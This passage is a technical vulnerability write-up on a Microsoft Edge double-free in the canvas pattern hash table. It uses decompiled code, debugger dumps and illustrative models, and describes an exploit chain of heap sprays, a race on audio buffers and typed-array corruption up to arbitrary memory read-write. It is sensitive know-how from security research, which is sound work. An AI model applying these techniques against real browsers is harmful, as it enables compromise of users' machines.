        ptr = MemoryProtection::HeapAlloc<0>(0x10ui64);
        newHashTableEntryValue = Abandonment::CheckAllocationUntyped(ptr, 0x10ui64);
        hashTableEntryValue = newHashTableEntryValue;
        if ( newHashTableEntryValue )
        {
            newHashTableEntryValue->ptrToDXImageRenderTarget = DXImageRenderTarget;
            if ( DXImageRenderTarget )
            {
                (*(*DXImageRenderTarget + 8i64))(DXImageRenderTarget);
            }
            LODWORD(hashTableEntryValue->refCounter) = 0;
        }
        else
        {
            hashTableEntryValue = 0i64;
        }
        result = CHtPvPvBaseT<&int nullCompare(void const *,void const *,void const *,bool),HashTableEntry>::Insert(entries, &v10, entryKey, hashTableEntryValue);
    }
    ++LODWORD(hashTableEntryValue->refCounter);
    return result;
}

On line 27 the vulnerable object is allocated. Note that the object is not allocated through the MemGC mechanism.

The hash table entries consist of a key-value pair. The key is a CCanvasPattern::Data object and the value is a DXImageRenderTarget. The initial size of the hash table allows it to hold up to 29 entries, although there is space for 37 entries. The extra space reduces the number of possible hash collisions. A hash function is applied to each key to determine its position in the hash table. When the hash table is full, the CHtPvPvBaseT<&int nullCompare(…),HashTableEntry>::Grow() method is called to increase the capacity of the hash table. During this call, key-value pairs are moved to new indexes; keys are removed from the previous positions, but the values remain. If, after the growth, a key-value pair has to be removed (e.g. a canvas pattern object is freed), the value is freed and the key-value pair is removed only from the new position.

When the number of entries drops below a certain value, the CHtPvPvBaseT<&int nullCompare(…),HashTableEntry>::Shrink() method is called to reduce the capacity of the hash table. During this call, key-value pairs are moved back to the previous positions.
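
The stale-value behaviour is easier to follow in a toy model. The sketch below is not the EdgeHTML implementation: the class name, the modulo hash, the slot layout and the rule that a null key maps to the first slot are all assumptions made for illustration. It models only the grow-and-remove half of the story and leaves Shrink() out.

```javascript
// Toy model of the stale-value behaviour. Everything here (class name,
// hash function, slot layout) is hypothetical, not EdgeHTML code.
class ToyTable {
  constructor(capacity) {
    this.slots = [];
    this.extend(capacity);
  }

  extend(capacity) {
    while (this.slots.length < capacity) {
      this.slots.push({ key: null, value: null });
    }
  }

  // Assumption: a null key always maps to the first slot.
  indexOf(key) {
    return key === null ? 0 : key % this.slots.length;
  }

  insert(key, value) {
    const slot = this.slots[this.indexOf(key)]; // collisions are ignored
    slot.key = key;
    slot.value = value;
  }

  findEntry(key) {
    const slot = this.slots[this.indexOf(key)];
    return slot.key === key ? slot : null;
  }

  // Move every pair to its new index; the old slot loses its key
  // but keeps its value, as the text describes for Grow().
  grow(capacity) {
    const live = this.slots
      .filter((slot) => slot.key !== null)
      .map((slot) => ({ key: slot.key, value: slot.value }));
    for (const slot of this.slots) slot.key = null;
    this.extend(capacity);
    for (const { key, value } of live) this.insert(key, value);
  }

  // Free the value and clear only the slot at the current index.
  remove(key) {
    const slot = this.findEntry(key);
    if (slot === null || slot.value === null) return;
    slot.value.freed = true;
    slot.key = null;
    slot.value = null;
  }
}

const table = new ToyTable(4);
const target = { name: "render target", freed: false };
table.insert(4, target); // 4 % 4 === 0, so the pair lands in slot 0
table.grow(8);           // 4 % 8 === 4, so the pair moves to slot 4
table.remove(4);         // frees the value and clears slot 4 only

const stale = table.findEntry(null); // a null key matches the keyless slot 0
console.log(stale.value.freed);      // true: slot 0 still references the freed value
```

In this model a lookup with a null key succeeds only if a stale value happens to sit in the first slot, which matches the observation that several attempts may be needed.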

When the canvas pattern object is freed, the hash table entry which holds the appropriate CCanvasPattern::Data object is removed via the following method call:

__int64 __fastcall TDispResourceCache<CDispNoLock,1,0>::Remove(
	__int64 resourceCache,
	__int64 a2,
	_QWORD *a3
)
{
    __int64 entries; // r14
    unsigned int hr; // ebx
    _QWORD *savedPtr_out; // rsi
    __int64 entryKey; // rbp
    HashTableEntry *hashTableEntry; // rax
    VulnObject *freedObject; // rdi
    bool doFreeObject; // zf
    __int64 savedPtr; // rcx
    void *v12; // rdx

    entries = resourceCache + 0x10;
    hr = 0;
    *a3 = 0i64;
    savedPtr_out = a3;
    entryKey = a2;
    hashTableEntry = CHtPvPvBaseT<&int nullCompare(void const *,void const *,void const *,bool),HashTableEntry>::FindEntry((resourceCache + 0x10), a2);
    if ( hashTableEntry && (freedObject = hashTableEntry->value) != 0i64 )
    {
        doFreeObject = LODWORD(freedObject->refCounter)-- == 0;
        savedPtr = freedObject->ptrToDXImageRenderTarget;
        if ( doFreeObject )
        {
            freedObject->ptrToDXImageRenderTarget = 0i64;
            *savedPtr_out = savedPtr;
            CHtPvPvBaseT<&int nullCompare(void const *,void const *,void const *,bool),HashTableEntry>::Remove(entries, entryKey);
            TDispResourceCache<CDispSRWLock,1,1>::CacheEntry::`scalar deleting destructor`(freedObject, v12);
        }
        else
        {
            *savedPtr_out = savedPtr;
            (*(*savedPtr + 8i64))(savedPtr);
        }
    }
    else
    {
        hr = 0x80004005;
    }
    return hr;
}

This method retrieves the hash table entry value by calling the CHtPvPvBaseT<&int nullCompare(…),HashTableEntry>::FindEntry() method.

If the call to CCanvasRenderingProcessor2D::EnsureBitmapRenderTarget() returns an error, the canvas pattern object has an uninitialized member which is supposed to hold a pointer to the CCanvasPattern::Data object. Nevertheless, the canvas pattern object destructor calls the CHtPvPvBaseT<&int nullCompare(…),HashTableEntry>::FindEntry() method and provides a key which is a nullptr. The method returns the very first value if there is any. If the hash table was grown and then shrunk, it will store pointers to the freed DXImageRenderTarget objects. Under such conditions, the TDispResourceCache<CDispNoLock,1,0>::Remove() method will operate on the already freed object (variable freedObject).

Several attempts are required to trigger the vulnerability because there will not always be an entry at the first position.

It is possible to exploit this vulnerability in one of two ways:

  1. allocate some object in place of the freed object and free it thus causing a use-after-free on an almost arbitrary object
  2. allocate some object which has a suitable layout (first quad-word must be a pointer to an object with a virtual function table) to call a virtual function and cause side-effects like corrupting some useful data

The first method was chosen for exploitation because it’s difficult to find an object which fits the requirements for the second method.

Exploit Development

The exploit turned out to be non-trivial due to the following reasons:

  • Microsoft Edge allocates objects with different sizes and types on different heaps; this reduces the number of available objects
  • the freed object is allocated on the default Windows heap which employs LFH; this makes it impossible to create adjacent allocations and reduces the chances of successful object overwrite
  • the freed object is 0x10 bytes; objects of this size are often used for internal servicing purposes; this makes the relevant heap region busy which also reduces exploitation reliability
  • there is a limited number of LFH objects of 0x10 bytes in size that are available from Javascript and are actually useful
  • objects that are available for control from Javascript allow only limited control
  • no object used during exploitation allows direct corruption of any field in a way that can lead to useful effects (e.g. controllable write)
  • multiple small heap allocations and frees were required to gain control over objects with interesting fields.

A high-level overview of the renderer exploitation process:

  1. the heap is prepared and the objects required for exploitation are sprayed
  2. all of the 0x10-byte DXImageRenderTarget objects are freed (one of them is the object which will be freed again)
  3. audio buffer objects are sprayed; this also creates 0x10-byte raw data buffer objects with arbitrary size and contents; some of the buffers take the freed spots
  4. the double-free is triggered and one of the 0x10-byte raw data buffer objects is freed (it is possible to read-write this object)
  5. objects of 0x10 bytes in size are sprayed; each contains two 0x8-byte pointers to 0x20-byte raw data buffer objects
  6. the exploit iterates over the raw data buffer objects allocated in step 3 and searches for the overwrite
  7. objects allocated in step 5 are freed (together with the 0x20-byte objects) and 0x20-byte typed arrays are sprayed over them
  8. the exploit leaks pointers to two of the sprayed typed arrays
  9. 0x10-byte objects are sprayed; each contains two pointers to 0x200-byte raw data buffer objects, to which the audio source will keep writing
  10. the exploit leaks pointers to two of the sprayed write-buffer objects
  11. the exploit starts playing audio and, in a loop, writes the address of the typed array to the controllable (vulnerable) object (the address is increased by 0x10 bytes to point to the length of the typed array); the audio buffer source node keeps writing to the 0x200-byte data buffer, but also keeps re-writing the pointers to that buffer in the 0x10-byte object, so the write is repeated in a loop to win the race
  12. after a certain amount of iterations the exploit quits looping and checks if the typed array has increased length
  13. at this point the exploit has achieved a relative read-write primitive
  14. the exploit uses the relative read to find the WebCore::AudioBufferData and WTF::NeuteredTypedArray objects (they are placed adjacent on the heap)
  15. the exploit uses data found during the previous step in order to construct a typed array which can be used for arbitrary read-write
  16. the exploit creates a fake DataView object for more convenient memory access
  17. once arbitrary read-write is achieved, the exploit launches a sandbox escape.

The following diagram can help understand the described steps:

Renderer exploitation steps

Getting relative read-write primitive

To trigger the vulnerability, thirty canvas pattern objects are created, which forces the hash table to grow. Then the canvas pattern objects are freed and the hash table is shrunk; this leaves a dangling pointer to the DXImageRenderTarget in the hash table entry. At this stage it is not yet possible to access the pointer to the freed object.

After the DXImageRenderTarget object is freed by the TDispResourceCache<CDispNoLock,1,0>::Remove method, the spray is performed to allocate audio context data buffer objects – let us call it spray “A”. Data buffer objects are created by calling audio context createBuffer(). This function has the following prototype:

let buffer = baseAudioContext.createBuffer(numOfchannels, length, sampleRate);

The numOfchannels argument denotes the number of pointers to channel data to create, length is the length of the data buffer, and sampleRate is not important for exploitation. Javascript createBuffer() triggers the call to CDOMAudioContext::Var_createBuffer(), which eventually calls WebCore::AudioChannelData::Initialize():

void __fastcall WebCore::AudioChannelData::Initialize(
	WebCore::AudioChannelData *this,
	struct WebCore::ExceptionState *a2,
	unsigned int a3
)
{
    WebCore::AudioChannelData *this_; // rsi
    unsigned int length; // ebx
    struct WebCore::ExceptionState *exceptionState; // rdi
    void *ptr; // rax
    __int64 IEOwnedTypedArray; // rax
    MemoryProtection *v8; // rbx

    this_ = this;
    length = a3;
    exceptionState = a2;
    ptr = MemoryProtection::HeapAlloc<0>(0x18ui64);
    IEOwnedTypedArray = Abandonment::CheckAllocationUntyped(ptr, 0x18ui64);
    if ( IEOwnedTypedArray )
    {
        IEOwnedTypedArray = WTF::IEOwnedTypedArray<1,float>::IEOwnedTypedArray<1,float>(IEOwnedTypedArray, __PAIR64__(exceptionState, IEOwnedTypedArray), length);
    }
    v8 = IEOwnedTypedArray;
    if ( !*exceptionState )
    {
        v8 = 0i64;
        TSmartMemory<WebCore::AudioProcessor>::operator=(this_ + 2, IEOwnedTypedArray);
    }
    if ( v8 )
    {
        WTF::IEOwnedTypedArray<1,float>::`scalar deleting destructor`(v8, 1);
    }
}

On line 17 a WTF::IEOwnedTypedArray object is allocated on the default Windows heap. This object is interesting for exploitation as it contains the following metadata:

0:016> dq 000001b0`374fbd80 L20/8
000001b0`374fbd80  00007ffe`47f8b4a0 000001b0`379e9030 ; vtable; pointer to the data buffer
000001b0`374fbd90  00000000`00000030 00080000`00000000 ; length; unused

0:016> dq 000001b0`379e9030 L10/8
000001b0`379e9030  0000003a`cafebeef 00000000`00000002 ; arbitrary data

0:016> ln 00007ffe`47f8b4a0
(00007ffe`47f8b4a0)   edgehtml!WTF::IEOwnedTypedArray<1,float>::`vftable`

On line 21 the data buffer is allocated (also on the default Windows heap). One of the buffers takes the spot of the freed DXImageRenderTarget object. This data buffer has the following layout:

0:016> dq 000001b0`377fa7e0 L10/8
000001b0`377fa7e0  00000000`00000000 00000000`00000001

The second quad-word is a reference counter. Values other than 1 trigger access to the virtual function table which does not exist and cause a crash. A reference counter value of 1 means that the object is going to be freed.
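
The role of the reference counter can be sketched with a toy version of the Remove() logic. This is a simplified model under assumptions: it reads the decompiled comparison as "decrement, then test for zero" (which is what the description of the counter implies), the function name removeEntry and the addRef method are hypothetical, and only the two fields named in the listing are modelled.

```javascript
// Toy model of the Remove() logic; field names follow the decompiled
// listing, everything else is hypothetical.
function removeEntry(entry) {
  entry.refCounter -= 1;
  if (entry.refCounter === 0) {
    // Last reference: the entry itself is released.
    entry.ptrToDXImageRenderTarget = null;
    return "freed";
  }
  // Non-zero counter: a virtual method is called on the stored pointer.
  if (entry.ptrToDXImageRenderTarget === null) {
    throw new Error("virtual call through a null pointer");
  }
  entry.ptrToDXImageRenderTarget.addRef();
  return "kept";
}

// The reclaimed data buffer: first quad-word 0, second quad-word 1.
const reclaimed = { ptrToDXImageRenderTarget: null, refCounter: 1 };
console.log(removeEntry(reclaimed)); // "freed"
```

With a counter of 1 the free path is taken without touching the null first quad-word; any other value reaches the virtual call and, in this model, throws.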

The data buffer which is allocated in place of the freed object is used throughout the exploit to read and write values placed inside this buffer.

Before freeing the object for the second time, audio context buffer sources are created by calling Javascript createBufferSource() – let us call it spray “B”. This function does not accept any arguments, but expects the buffer property to be set. These allocations are made before the vulnerable object is freed so as to avoid unnecessary noise on the heap. The buffer property is set to one of the buffer objects which were created during startup (i.e. before triggering the vulnerability) by calling createBuffer() – let us call it spray “C”. During this property access, the following method is called:

void __fastcall WebCore::AudioBufferSourceNode::setBuffer(
	WebCore::AudioBufferSourceNode *this,
	struct IActiveScriptDirect *a2,
	struct WebCore::AudioBuffer *a3,
	struct WebCore::ExceptionState *a4
)
{
    struct WebCore::ExceptionState *exceptionState; // rbp
    struct WebCore::AudioBuffer *audioBuffer; // rsi
    struct IActiveScriptDirect *v6; // r12
    WebCore::AudioBufferSourceNode *this_; // rdi
    bool v8; // zf
    struct CBase **v9; // r14
    __int64 v10; // rcx
    void *channelCount; // r15
    WebCore::AudioNodeOutput *audioNode; // rax
    WebCore::AudioContext *v13; // [rsp+20h] [rbp-38h]
    bool v14; // [rsp+28h] [rbp-30h]
    int hr; // [rsp+70h] [rbp+18h]

    exceptionState = a4;
    audioBuffer = a3;
    v6 = a2;
    this_ = this;
    if ( a3 )
    {
        v8 = *(this + 0x1E) == *(a3 + 6);
    }
    else
    {
        v8 = *(this + 0x1D) == 0i64;
    }
    if ( !v8 )
    {
        v9 = (this + 0xE8);
        if ( *(this + 0x1D) )
        {
            hr = 0x8070000B;
            WebCore::ExceptionState::throwDOMException(a4, &hr, 0xDC37u);
            return;
        }
        v13 = *(this + 8);
        WebCore::AudioContext::lock(v13, &v14);
        EnterCriticalSection(this_ + 4);
        ++*(this_ + 0x19);
        // some code skipped for brevity...
        channelCount = *(*(audioBuffer + 6) + 0x20i64);
        if ( channelCount <= 0x20 )
        {
            if ( !*(audioBuffer + 0x38) )
            {
                if ( (*(this_ + 0x27) - 1) <= 1 )
                {
                    WebCore::AudioBufferSourceNode::acquireBufferContents(this_, exceptionState, v6, audioBuffer);
                    if ( *exceptionState )
                    {
                        goto LABEL_23;
                    }
                    if ( *(this_ + 0x138) )
                    {
                        WebCore::AudioBufferSourceNode::clampGrainParameters(this_, audioBuffer);
                    }
                    else
                    {
                        *(this_ + 0x26) = 0i64;
                    }
                }
                CJScript9Holder::InsertReferenceTo(this_, audioBuffer);
                audioNode = WebCore::AudioNode::output(this_, 0);
                WebCore::AudioNodeOutput::setNumberOfChannels(audioNode, channelCount);
                TSmartArray<System::String *>::New(this_ + 0x20, channelCount);
LABEL_20:
                if ( *v9 )
                {
                    CJScript9Holder::RemoveReferenceTo(this_, *v9);
                }
                TSmartPointer<CVideoElement,Tree::NodeReferenceTraits,CVideoElement *>::operator=(v9, audioBuffer);
                goto LABEL_23;
            }
            hr = 0x8070000B;
            WebCore::ExceptionState::throwDOMException(exceptionState, &hr, 0xDC33u);
        }
        else
        {
            WebCore::ExceptionState::throwTypeError(exceptionState, 0xDC06u, channelCount);
        }
LABEL_23:
        --*(this_ + 0x19);
        LeaveCriticalSection(this_ + 4);
        WebCore::AudioContext::AutoLocker::~AutoLocker(&v13);
    }
}

On line 71 yet another data buffer is allocated. The number of bytes depends on the number of channels. Each channel creates one pointer which points to data of arbitrary size and controllable contents. This is a useful primitive which is used later during the exploitation process.
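
The relation between the channel count and the allocation size can be written down as a small calculation. This is a sketch under assumptions: it supposes one 8-byte pointer per channel with no extra header (consistent with the 0x10-byte objects holding two pointers), the function name is hypothetical, and the lower bound of one channel is added here rather than taken from the listing.

```javascript
// Assumption: one 8-byte pointer per channel and no extra header.
const POINTER_SIZE = 8;
const MAX_CHANNELS = 0x20; // upper limit checked in setBuffer()

// Hypothetical helper: size in bytes of the per-channel pointer array.
function channelPointerArraySize(channelCount) {
  if (!Number.isInteger(channelCount) || channelCount < 1 || channelCount > MAX_CHANNELS) {
    throw new RangeError("channel count out of range");
  }
  return channelCount * POINTER_SIZE;
}

console.log(channelPointerArraySize(2).toString(16));    // "10"
console.log(channelPointerArraySize(0x20).toString(16)); // "100"
```

Under these assumptions a two-channel buffer yields an allocation in the same 0x10-byte size class as the freed object.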

To trigger the call to the WebCore::AudioBufferSourceNode::setBuffer() method, the audio must be already playing: either start() is called with the buffer property already set, or the buffer property is set and then start() is called.

Next, the double-free vulnerability is triggered and one of the audio channel data buffers is freed, although control from Javascript is retained.

The start() method of the audio buffer source object is called on each object of spray “B”. This creates multiple 0x10-byte sized objects with two pointers to the 0x20-byte sized data buffer object of spray “C”. During this spray one of the sprayed objects takes over the freed object from spray “A”.

Then the exploit iterates over spray “A” to find a data buffer with changed contents. Each object of spray “A” has a getChannelData() method, which returns the channel data as a Float32Array typed array; it accepts only the channel number as an argument. Once the change has been found, a typed array is created. This typed array is read-writable and is further used multiple times in the exploit to leak and write pointers. Let us call it typed array “TA1”.
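
Because the channel data is exposed as 32-bit floats, a 64-bit pointer has to be split into two float elements and reassembled. The post does not show how the exploit does this; the following is a common approach, sketched with hypothetical helper names and assuming a little-endian platform.

```javascript
// Two views over the same 8 bytes: one as floats, one as raw 32-bit words.
const scratch = new ArrayBuffer(8);
const f32 = new Float32Array(scratch);
const u32 = new Uint32Array(scratch);

// Reassemble a 64-bit value from two consecutive Float32Array elements.
function floatsToPointer(lo, hi) {
  f32[0] = lo;
  f32[1] = hi;
  return (BigInt(u32[1]) << 32n) | BigInt(u32[0]);
}

// Split a 64-bit value into the two floats that carry the same bits.
function pointerToFloats(ptr) {
  u32[0] = Number(ptr & 0xffffffffn);
  u32[1] = Number(ptr >> 32n);
  return [f32[0], f32[1]];
}

// Round trip with the data buffer pointer from the dump shown earlier.
const [lo, hi] = pointerToFloats(0x000001b0379e9030n);
console.log(floatsToPointer(lo, hi).toString(16)); // "1b0379e9030"
```

One caveat of this approach: 32-bit halves whose bit pattern encodes a NaN may not survive the trip through a JavaScript number unchanged.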

After the controllable channel data typed array is found, all of the spray “B” objects are freed. All data relevant to spray “B” is scoped to a single function. This is required to remove all internal references from Javascript to the data buffer from spray “C”; otherwise it would not be possible to free the data buffer later.

After the return from the function, another spray is made – let us call it spray “D”. This spray prepares an audio buffer source data for the next steps and takes over the freed object. At this point the overwritten object does not contain data.

Then the exploit iterates over spray “D” and calls the start() function of each object. This writes to the freed object two pointers pointing to the 0x200-byte sized objects. These objects are used by the audio context to write audio data to be played. It is important to note that data is periodically written to this buffer and that the pointers are constantly re-written to the 0x10-byte objects. (This poses another problem which is resolved at the next step.) These pointers are also leaked via the “TA1” typed array.

Then the buffer object which was used for spray “B” is freed and a different spray is performed to take over the just-freed data buffer – let us call it spray “E”. Spray “E” allocates typed arrays (which are of size 0x20 bytes) and one of the typed arrays overwrites contents of the freed 0x20-byte data buffer. This allows a leak of pointers to two of the sprayed typed arrays via the typed array “TA1”. Only one pointer to the typed array is required for the exploit, let us call it typed array “TA2”. This typed array points to the data buffer of 0x30 bytes. The size of this buffer is important as it allows placement of other objects nearby which are useful for exploitation.

At this point it is known where the two typed arrays and the two audio write-buffers are located. The exploit enters a loop which constantly writes a pointer to the “TA2” typed array to the 0x10-byte object. The written pointer is increased by 0x10 bytes to point to the length field. The loop is required to win a race condition because the audio context thread keeps re-writing pointers in the 0x10-byte object. After a certain number of iterations the loop is ended and the exploit searches for the overwritten typed array.

The overwritten WTF::IEOwnedTypedArray typed array gives a relative read-write primitive.
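
Why a corrupted length field amounts to a relative read-write primitive can be shown with a toy heap. In the sketch below "pointers" are just byte offsets into an ArrayBuffer, the header layout (vtable, data pointer, length) follows the WTF::IEOwnedTypedArray dump shown earlier, and treating the length as a byte count is an assumption. All names are hypothetical.

```javascript
// Toy heap: a flat buffer in which "pointers" are byte offsets.
const heap = new DataView(new ArrayBuffer(0x100));
const HEADER = 0x20;    // where the toy typed-array header lives
const DATA = 0x60;      // where its 0x30-byte data buffer lives
const NEIGHBOUR = 0x98; // an unrelated byte just past the data buffer

heap.setBigUint64(HEADER + 0x00, 0x00007ffe47f8b4a0n, true); // vtable
heap.setBigUint64(HEADER + 0x08, BigInt(DATA), true);        // data pointer
heap.setBigUint64(HEADER + 0x10, 0x30n, true);               // length
heap.setUint8(NEIGHBOUR, 0x41);

// Bounds-checked element read, driven entirely by the header fields.
function readByte(header, index) {
  const length = Number(heap.getBigUint64(header + 0x10, true));
  if (index < 0 || index >= length) throw new RangeError("index out of bounds");
  const data = Number(heap.getBigUint64(header + 0x08, true));
  return heap.getUint8(data + index);
}

const index = NEIGHBOUR - DATA; // 0x38, outside the original 0x30 bytes
let blocked = false;
try {
  readByte(HEADER, index);
} catch (e) {
  blocked = e instanceof RangeError;
}
console.log(blocked); // true

// Model of the write that lands at header + 0x10 (the length field).
heap.setBigUint64(HEADER + 0x10, 0x80n, true);
console.log(readByte(HEADER, index).toString(16)); // "41"
```

The data pointer is untouched, so access stays relative to the original buffer; only the range that passes the bounds check grows.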

Getting arbitrary read-write primitive

Before triggering the vulnerability the exploit has made another spray which has allocated the buffer sources and appropriate buffers for the sources – let us call it spray “F”. During this spray the WebCore::AudioBufferData objects of 0x30 bytes in size with the following memory layout are created:

0:016> dq 000001b0`379e9570 L30/8
000001b0`379e9570  00007ffe`47f85988 00000000`45fa0000
000001b0`379e9580  00000000`0000000c 000001b0`379e9420
000001b0`379e9590  0000000a`0000000a 00000000`00000001
0:016> ln 00007ffe`47f85988
(00007ffe`47f85988)   edgehtml!RefCounted<WebCore::AudioBufferData,MultiThreadedRefCount>::`vftable`

These objects are placed near the data buffer which is controlled by the typed array “TA2”. WTF::NeuteredTypedArray objects of size 0x30 bytes are placed nearby too:

0:016> dq 000001b0`379e97b0 L30/8
000001b0`379e97b0  00007ffe`47f8b460 000001b0`21fa7fa0
000001b0`379e97c0  00000000`00000020 000001b0`20e6e550
000001b0`379e97d0  00000000`00000001 000001b0`381fc380
0:016> ln 00007ffe`47f8b460
(00007ffe`47f8b460)   edgehtml!WTF::NeuteredTypedArray<1,float>::`vftable`

After the relative read-write primitive is gained, offsets from the beginning of the typed array “TA2” buffer to these objects are found by searching for the specific pattern.
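The pattern search can be sketched roughly as follows. This is a minimal illustration, not the exploit's actual code: the post does not state which fields are matched, so the `Pattern` type, the wildcard handling and the function name `find_pattern` are all assumptions. The region stands for the qwords readable through the relative primitive.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <optional>
#include <vector>

// One entry per qword; std::nullopt means "any value" (hypothetical wildcard).
using Pattern = std::vector<std::optional<std::uint64_t>>;

// Scan qword-aligned memory for the first position where every non-wildcard
// pattern entry matches. Returns the byte offset from the start of the region.
std::optional<std::size_t> find_pattern(const std::vector<std::uint64_t>& region,
                                        const Pattern& pattern) {
    assert(!pattern.empty());
    for (std::size_t i = 0; i + pattern.size() <= region.size(); ++i) {
        bool match = true;
        for (std::size_t j = 0; j < pattern.size(); ++j) {
            if (pattern[j].has_value() && *pattern[j] != region[i + j]) {
                match = false;
                break;
            }
        }
        if (match) {
            return i * sizeof(std::uint64_t);
        }
    }
    return std::nullopt;
}
```

For example, a pattern of "known first qword, any pointer, then 0x20" applied to memory shaped like the WTF::NeuteredTypedArray dump above would yield the byte offset of that object within the scanned region.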

Knowing the offset to the WebCore::AudioBufferData object makes it possible to leak a pointer to the audio channel data buffer. (The audio channel data is used to create a fake controllable DataView object and eventually achieve an arbitrary read-write primitive.) The pointer to the audio channel data buffer is stored at offset 0x18 of the WebCore::AudioBufferData object. Before calling getChannelData(), the memory layout of the channel data buffer looks like the following:

0:001> dq 00000140`e87e81c0 L30/8
00000140`e87e81c0  00007ffe`47f85988 00000000`45fa0000
00000140`e87e81d0  00000000`0000000c 00000142`01c6b230
00000140`e87e81e0  0000000a`0000000a 00000000`00000001
0:001> dq 00000142`01c6b230
00000142`01c6b230  00000000`00000000 00000000`00000000
00000142`01c6b240  00000140`e87ee160 00000000`00000000
00000142`01c6b250  00000000`00000000 00000140`e87ee240
00000142`01c6b260  00000000`00000000 00000000`00000000
00000142`01c6b270  00000140`e87ee2e0 00000000`00000000
00000142`01c6b280  00000000`00000000 00000140`e87ee4c0
00000142`01c6b290  00000000`00000000 00000000`00000000
00000142`01c6b2a0  00000140`e87ee500 00000000`00000000
0:001> dq 00000140`e87ee160
00000140`e87ee160  00007ffe`47f8b4a0 00000140`e87e8430
00000140`e87ee170  00000000`00000030 00080000`00000000
00000140`e87ee180  00007ffe`47de5838 00000140`e87ee180
00000140`e87ee190  80000000`00000000 00040000`00000000
00000140`e87ee1a0  00007ffe`47f8b4a0 00000140`e87e8490
00000140`e87ee1b0  00000000`00000030 00080000`00000000
00000140`e87ee1c0  00007ffe`47de5838 00000140`e87ee1c0
00000140`e87ee1d0  80000000`00000000 00080000`00000000
0:001> ln 00007ffe`47de5838
(00007ffe`47de5838)   edgehtml!WTF::TypedArray<1,float>::`vftable`

After calling getChannelData() member of the WebCore::AudioBufferData object, pointers in the channel data buffer are moved around and start pointing to the typed array objects allocated on the Chakra heap. This is important as it allows leaking the typed array pointers and creating a fake typed array. This is the memory layout of the channel data buffer after the call to getChannelData():

0:001> dq 00000140`01c6b230
00000140`01c6b230  00000140`e87e7eb0 00000000`00000000 ; pointer to the typed array
00000140`01c6b240  00000000`00000000 00000141`0142f900
00000140`01c6b250  00000000`00000000 00000000`00000000
00000140`01c6b260  00000141`0142f880 00000000`00000000
00000140`01c6b270  00000000`00000000 00000141`0142f800
00000140`01c6b280  00000000`00000000 00000000`00000000
00000140`01c6b290  00000141`0142f780 00000000`00000000
00000140`01c6b2a0  00000000`00000000 00000141`0142f700
0:001> dq 00000140`e87e7eb0 L40/8
00000140`e87e7eb0  00007ffe`4694c630 00000140`e87e7e60
00000140`e87e7ec0  00000000`00000000 00000000`00000000
00000140`e87e7ed0  00000000`00000020 00000141`01a9d280
00000140`e87e7ee0  00000000`00000004 00000141`01314ec0
0:001> ln 00007ffe`4694c630
(00007ffe`4694c630)   chakra!Js::TypedArray<float,0,0>::`vftable`

Knowing the offset to the WTF::NeuteredTypedArray object makes it possible to achieve an arbitrary read primitive.

The buffer this object points to cannot be used for a write. Once a write happens, the buffer is moved to another heap. Increasing the length of the buffer is not possible either, because security asserts are enabled: an attempt to write to the buffer with a modified length crashes the renderer process.

The layout of the WTF::NeuteredTypedArray object looks like the following:

0:001> dq 00000140`e87e81f0 L30/8
00000140`e87e81f0  00007ffe`47f8b460 00000140`e70f87e0
00000140`e87e8200  00000000`00000020 00000140`d1c6e5a0
00000140`e87e8210  00000000`00000001 00000140`d1cff2a0
0:001> ln 00007ffe`47f8b460
(00007ffe`47f8b460)   edgehtml!WTF::NeuteredTypedArray<1,float>::`vftable`
0:001> dq 00000140`e70f87e0 L20/8
00000140`e70f87e0  00000000`cafe0011 00000000`00000032
00000140`e70f87f0  00000000`00000000 00000000`00000000

A pointer to the data buffer is stored at offset 8. It is possible to overwrite this pointer and point to any address to arbitrarily read memory.
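The idea can be modelled in ordinary C++ as below. This is only a sketch under stated assumptions: `FakeTypedArray` is a hypothetical stand-in for the 0x30-byte native object (only the data pointer at offset 8 comes from the post), the relative write is modelled with `memcpy` into the object's raw bytes, and a 64-bit build is assumed.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>

// Hypothetical model of the native typed array object. Only the position of
// the data pointer (offset 8) is taken from the post; other fields are opaque.
struct FakeTypedArray {
    std::uint64_t vftable;      // +0x00
    const std::uint8_t* data;   // +0x08: pointer to the data buffer
    std::uint64_t fields[4];    // +0x10..+0x2f: not modelled here
};
static_assert(sizeof(void*) == 8, "sketch assumes a 64-bit target");
static_assert(offsetof(FakeTypedArray, data) == 8, "data pointer must sit at offset 8");
static_assert(sizeof(FakeTypedArray) == 0x30, "object is expected to be 0x30 bytes");

// Models the relative write: overwrite the qword at offset 8 of the object.
void retarget(FakeTypedArray& arr, const void* target) {
    unsigned char* raw = reinterpret_cast<unsigned char*>(&arr);
    std::memcpy(raw + 8, &target, sizeof(target));
}

// Models the arbitrary read: point the array at `address`, then read through it.
std::uint64_t read_qword(FakeTypedArray& arr, const void* address) {
    assert(address != nullptr);
    retarget(arr, address);
    std::uint64_t value = 0;
    std::memcpy(&value, arr.data, sizeof(value));
    return value;
}
```

In this model, reading any qword in the process only requires one pointer overwrite followed by a normal element read, which mirrors why the data pointer is such a convenient target.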

With the arbitrary read primitive the contents of the typed array and the channel data buffer of the WebCore::AudioBufferData object are leaked. With the ability to write to the relative typed array, the following contents are placed in the controllable buffer:

0:001> dq 00000140`e87e7da0 L150/8
00000140`e87e7da0  00000140`e87e7eb0 00000000`00000000
00000140`e87e7db0  00000000`00000000 00000141`0142f900
00000140`e87e7dc0  00000000`00000000 00000000`00000000
00000140`e87e7dd0  00000141`0142f880 00000000`00000000
00000140`e87e7de0  00000000`00000000 00000141`0142f800
00000140`e87e7df0  00000000`00000000 00000000`00000000
00000140`e87e7e00  00000141`0142f780 00000000`00000000
00000140`e87e7e10  00000000`00000000 00000141`0142f700
00000140`e87e7e20  00000000`00000000 00000000`00000000
00000140`e87e7e30  00000141`0142f680 00000000`00000000
00000140`e87e7e40  00000000`00000000 00000141`0142f600
00000140`e87e7e50  00000000`00000000 00000000`00000000
00000140`e87e7e60  00000080`00000038 00000140`d2968000 ; type tag ; pointer to the Js::JavascriptLibrary
00000140`e87e7e70  00000000`00000000 00000141`0142f500
00000140`e87e7e80  00000000`00000000 00000000`00000000
00000140`e87e7e90  00000000`00000000 00000000`00000000
00000140`e87e7ea0  00000001`00002958 00000000`0f69d8c7
00000140`e87e7eb0  00007ffe`4694c630 00000140`e87e7e60 ; vtable; metadata pointer
00000140`e87e7ec0  00000000`00000000 00000000`00000000
00000140`e87e7ed0  00000000`00000020 00000141`01a9d280
00000140`e87e7ee0  00000000`00000004 00000141`01314ec0
0:001> dq 00000140`e87e7f80 L30/8
00000140`e87e7f80  00007ffe`47f85988 00000000`45fa0000
